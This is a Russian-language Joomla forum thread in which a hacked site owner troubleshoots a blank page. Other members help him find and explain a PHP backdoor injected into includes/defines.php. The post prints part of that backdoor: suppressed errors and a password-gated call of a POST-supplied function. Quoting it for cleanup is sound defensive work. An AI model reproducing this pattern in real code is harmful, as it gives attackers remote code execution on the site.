0 Пользователей и 1 Гость просматривают эту тему.
  • 40 Ответов
  • 1255 Просмотров
*

Dzen

  • Осваиваюсь на форуме
  • 30
  • 0
Добрый день,

Взломали.
Залили шелл.
Но файлы вируса были найдены и удалены.
Индексная страница была почищена от мусора.
Сделан архив всех файлов.
После, всё работало несколько дней.

На текущий момент, при заходе на главную страницу домена, белый экран.

Заливка файлов из "ремонтного" архива результата не даёт.

в логах доступа:
[27/Jan/2016:10:23:45 +0300] "GET / HTTP/1.0" 200 0 "-" "Mozilla/5.0 ….

при заходе же в админку, получаем 500 и белый экран.
[27/Jan/2016:10:23:57 +0300] "GET /administrator/ HTTP/1.0" 500 0 "-" "Mozilla/5.0…

error лог апачевский  при этом чист!
сами ошибки пишутся, если намеренно их сделать.
так же, ошибки отображаются если их намеренно сделать в индексном файле.
так как включены все
ini_set('display_errors',1);
error_reporting(E_ALL);
и т.д.

Подобная картина наблюдалась при попытке переименовать админску директорию, но на данный момент все названия директорий оригинальные.
А также был случай у кого-то, что подобная ситуация возникала при закрытии коннекта к твиттеру, коннект делал какой-то модуль в Joomla и создавал проблему, подвешивал Joomla. Как это проверить, не понятно.

Какие варианты еще рассмотреть?
Может быть права на запись файла какие-то изменены?
Есть файл notice.php – он пуст.

вирус был вроде php.shell-38

« Последнее редактирование: 27.01.2016, 10:57:14 от Dzen »
*

winstrool

  • Завсегдатай
  • 773
  • 42
  • Свободен для работы
В Joomla конфиге есть такой параметр    public $debug = '0'; замените его на 1 и в дебаге смотрите суть проблемы
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям
*

SeBun

  • Практически профи
  • 3154
  • 193
  • @SeBun48
Так же неплохо заглянуть в папку logs...
Оказываю услуги по Joomla | Миграция на Joomla 3.x | Сопровождение | IT-аутсорсинг
*

Dzen

  • Осваиваюсь на форуме
  • 30
  • 0
В Joomla конфиге есть такой параметр    public $debug = '0'; замените его на 1 и в дебаге смотрите суть проблемы

спасибо, включил, но куда дебагится всё это дело? в /logs/ вроде нету
*

winstrool

  • Завсегдатай
  • 773
  • 42
  • Свободен для работы
спасибо, включил, но куда дебагится всё это дело? в /logs/ вроде нету

в футере вашего сайта смотрите консоль выскачит
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям
*

Dzen

  • Осваиваюсь на форуме
  • 30
  • 0
в футере вашего сайта смотрите консоль выскачит

так белый экран, ничего ж не открывается.

Так же неплохо заглянуть в папку logs...

error.php - последняя запись в 2015 году.

в joomla_update.php
Обновление до версии 3.4.8 из github.com/joomla/joomla-cms/releases/download/3.4.8/
это после первой починки.
*

winstrool

  • Завсегдатай
  • 773
  • 42
  • Свободен для работы
Попробуйте такой набор в php:
Цитировать
ini_set('error_reporting', E_ALL);
ini_set('display_errors', 1);
ini_set('display_startup_errors', 1);

или в htaccess:
Цитировать
php_value display_errors 1
php_value display_startup_errors 1
php_value error_reporting E_ALL
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям
*

Arkadiy

  • Группа развития
  • 5350
  • 440
  • Крепитесь, други.
Не надо так пробовать, вывод ошибок прекрасно включается в настройках Joomla.
*

Dzen

  • Осваиваюсь на форуме
  • 30
  • 0
Не надо так пробовать, вывод ошибок прекрасно включается в настройках Joomla.

ну до настроек может дело не доходить при исполнении скрипта


Попробуйте такой набор в php:
или в htaccess:

тоже самое
экран белый
error лог апачевский чист
в доступ логе код 200

*

Arkadiy

  • Группа развития
  • 5350
  • 440
  • Крепитесь, други.
ну до настроек может дело не доходить при исполнении скрипта
Практически в 100% случаев доходит. Делайте сначала самые простые вещи, успеете в коде поковыряться.
*

Dzen

  • Осваиваюсь на форуме
  • 30
  • 0
Практически в 100% случаев доходит. Делайте сначала самые простые вещи, успеете в коде поковыряться.

сделали
public $debug = '1';
не помогло

еще чего можно?

было обновление до версии 3.4.8 , оно не вносит ли какие-то изменения в таблицы в базе?
потому как рассматриваю вариант, что после обновления, могли подменить новый php файл, на старый, который запросы к базе делает к другим полям. И как результат, конфликт и тишина. Нет? Если да, то как посмотреть.
Варианты включения показа ошибок ничего не дают.

в конфиге еще стоит
   public $error_reporting = 'default';
*

Arkadiy

  • Группа развития
  • 5350
  • 440
  • Крепитесь, други.
Я говорил про настройки Joomla. http://joxi.ru/p27W0b8t0xW7W2 Отладка и сообщения об ошибках - разные вещи.
*

Dzen

  • Осваиваюсь на форуме
  • 30
  • 0
если его намеренно сделать с ошибкой:
public $error_reporting = E_ALL; а не 'E_ALL' , т.е. написать без кавычек.

то получим на главной странице:

Fatal error: Cannot redeclare file_put_contents() in /home/..../www/plugins/system/xcalendar/xcalendar.php on line 205

но это вроде бы норма.
*

Dzen

  • Осваиваюсь на форуме
  • 30
  • 0
Я говорил про настройки Joomla. http://joxi.ru/p27W0b8t0xW7W2 Отладка и сообщения об ошибках - разные вещи.

ну чтоб в настройки-то войти надо в админку попасть:)
*

Dzen

  • Осваиваюсь на форуме
  • 30
  • 0
админка выдаёт 500! в логе аппача
*

Arkadiy

  • Группа развития
  • 5350
  • 440
  • Крепитесь, други.
Тогда поставьте $error_reporting = 'development'; в конфиге.
*

Dzen

  • Осваиваюсь на форуме
  • 30
  • 0
Тогда поставьте $error_reporting = 'development'; в конфиге.

про вывод ошибок, нашёл.

почему-то в includes/defines.php

стоял еррор_репортинг = 0 !
который выключал принудительные установки вывода ошибок в индексном файле.

код defines.php:
Код
...
error_reporting(0);
$_passssword = '.....................';

$p = $_POST;

if (@$p[$_passssword] AND @$p['a'] AND @$p['c']) @$p[$_passssword](@$p['a'], @$p['c'], '');


if (!empty($_GET['check']) AND $_GET['check'] == $_passssword) {
    echo('<!--checker_start ');
    $tmp = request_url_data('http://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css');


и теперь получаем:

Fatal error: Cannot redeclare file_put_contents() in /home/..../..../www/plugins/system/xcalendar/xcalendar.php on line 205

закрыты права на запись файла? проблема в этом плагине видимо.
*

winstrool

  • Завсегдатай
  • 773
  • 42
  • Свободен для работы
Знакомый бегдор!, вы сначало сайт от вирусов почистите, а потом подправляйте систему, битые файлы!

P.S: Какой то касяченый взломщик, так систему палить....
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям
*

Dzen

  • Осваиваюсь на форуме
  • 30
  • 0
Знакомый бегдор!, вы сначало сайт от вирусов почистите, а потом подправляйте систему, битые файлы!

P.S: Какой то касяченый взломщик, так систему палить....

знакомый бекдор это про xcalendar? или про те изменения которые в defines.php ?
*

Dzen

  • Осваиваюсь на форуме
  • 30
  • 0
в общем сделал пока так и всё работает.

закомментил функцию в xcalendar.php:

Код

if (!function_exists("file_put_contents")) {
function file_put_contents($filename, $text) {
$f = fopen($filename, "w");
if (!$f) return false;

if (!fwrite($f, $text)) return false;
fclose($f);

return true;
}


}



*

winstrool

  • Завсегдатай
  • 773
  • 42
  • Свободен для работы
знакомый бекдор это про xcalendar? или про те изменения которые в defines.php ?
Это про те изменения, что в defines.php, от сюда следует что сначала пролечите сайт, а потом разберайтесь, что не учли и в чем может быть проблема, также не ясно что там у вас в xcalendar.php  on line 205, по ошибки, что то обработать вроде не может...
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям
*

Dzen

  • Осваиваюсь на форуме
  • 30
  • 0
не ясно что там у вас в xcalendar.php  on line 205, по ошибки, что то обработать вроде не может...

функцию привёл выше, не может записать в файл вроде как

на defines.php поставил права 444
были 644
теперь в него не может никто писать вроде бы
*

winstrool

  • Завсегдатай
  • 773
  • 42
  • Свободен для работы
функцию привёл выше, не может записать в файл вроде как

на defines.php поставил права 444
были 644
теперь в него не может никто писать вроде бы
А зачем в него писать, когда в нем уже все что нужно записано?, со 100% уверенностью могу сказать что это не один такой файл, про сканируйте айболитом в режиме параноика, а там сами убедитесь!
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям
*

Dzen

  • Осваиваюсь на форуме
  • 30
  • 0
Цитировать
А зачем в него писать, когда в нем уже все что нужно записано?

а чтобы второй раз туда ничего не записали
и все функции внутри него я закомментил, вообще все что были.

там 4 сайта (4 папки) по одному доступу ftp
причём 2 сайта взломали
остальные нет или нет видимости
найти очень сложно каким способом был лом
*

winstrool

  • Завсегдатай
  • 773
  • 42
  • Свободен для работы
Чуствую вам сложно что то доказывать, вообщем если есть необходимость, в этом разделе полно информации, разбирайтесь...
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям
*

Dzen

  • Осваиваюсь на форуме
  • 30
  • 0
да нет, всё верно, просто почему файл не закрыть.
а проверить все файлы на вирусы надо, просто пока не ясно как лучше это сделать.

а так совершенно правы, т.к. в других файлах я уже обнаруживал странный мусор и комментил.
*

winstrool

  • Завсегдатай
  • 773
  • 42
  • Свободен для работы
да нет, всё верно, просто почему файл не закрыть.
а проверить все файлы на вирусы надо, просто пока не ясно как лучше это сделать.

а так совершенно правы, т.к. в других файлах я уже обнаруживал странный мусор и комментил.

Как правило взломщики оставляют несколько бегдоров, а то и кучу и пару полноценных шеллов, что приводит к полноценному доступу к вашим сайтам, к соседям тоже, если на одном аккаунте, а там ничего не мешает крутить вертеть вашими сайтами, вплоть до того что обратно менять права с 0444 на 06444, на счет проверки, выше я вам писал про скрипт ai-bolit, вот им и сканьте все сайты...
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям
*

Dzen

  • Осваиваюсь на форуме
  • 30
  • 0
спасибо.

а как имеено взломали, кроме как анализа апачевских логов никаких не узреть?
*

winstrool

  • Завсегдатай
  • 773
  • 42
  • Свободен для работы
Можите домены в ПМ кинуть с версиями движка?

P.S: Нужно следить за багтреками и понимать природу уязвимостей, тогда кроме апачевских логов станет все ясно...
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям
*

SeBun

  • Практически профи
  • 3154
  • 193
  • @SeBun48
Объясню на пальцах. У вас был получен доступ к файловой системе сервера, произведена запись кода вида
Код: php
error_reporting(0);
$_passssword = '.....................';

$p = $_POST;

if (@$p[$_passssword] AND @$p['a'] AND @$p['c']) @.......

Этот код позволяет получить удаленный доступ к вашему сайту и выполнить произвольный код. Сейчас уже не имеют значение права, которые вы выставили, не имеет значение и то, что вы что то где то меняете. Если сами не понимаете, что делать, наймите специалиста. Вас взломали, и искать нужно не только следствие этого взлома, но и его причины. Пройдитесь сканером, как советовали, но опять же, что бы работать со сканером, нужно иметь хотя бы базовые знание PHP.
Оказываю услуги по Joomla | Миграция на Joomla 3.x | Сопровождение | IT-аутсорсинг
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Не выводятся материалы ZOO. После вируса

Автор nuclearacid

Ответов: 1
Просмотров: 151
Последний ответ 29.05.2017, 21:48:36
от robert
реанимировать сайт после вируса

Автор smled

Ответов: 10
Просмотров: 214
Последний ответ 12.02.2017, 21:22:45
от effrit
3.2.7 после вируса, как обновить вручную?

Автор smivan85

Ответов: 8
Просмотров: 262
Последний ответ 30.01.2017, 17:29:02
от ProtectYourSite
После запрета регистрации, все равно регистрируются

Автор rafaello9

Ответов: 2
Просмотров: 281
Последний ответ 25.11.2016, 17:50:19
от flyingspook
После обновления и защиты через.htaccess, сайт по-прежнему взламывают

Автор Kiskenbassker

Ответов: 20
Просмотров: 522
Последний ответ 30.06.2016, 13:39:27
от SeBun